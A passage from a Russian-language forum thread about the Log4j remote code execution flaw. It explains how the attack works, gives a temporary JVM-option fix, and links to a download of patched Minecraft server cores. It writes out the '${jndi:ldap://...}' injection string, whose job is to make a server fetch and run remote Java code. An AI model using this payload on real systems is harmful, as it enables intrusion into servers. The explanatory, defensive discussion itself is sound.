- У половины интернета нашли выполнение произвольного кода через Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://Ссылка скрыта, пожалуйста Войдитеили Зарегистрируйтесь } в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у Ссылка скрыта, пожалуйста Войдитеили Зарегистрируйтесь
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта). - Ссылка скрыта, пожалуйста Войдите
или Зарегистрируйтесь
Java уязвимость -Dlog4j.formatMsgNoLookups=true
- Автор темы McDev
- Дата начала
Уже есть ядрас фиксом данной проблемы (сам использую)
Вот ссылка- https://forum-minecraft.ru/resources/skachat-jadra-spigot-vsex-versij-s-ispravleniem-dlog4j2.1333/
Вот ссылка- https://forum-minecraft.ru/resources/skachat-jadra-spigot-vsex-versij-s-ispravleniem-dlog4j2.1333/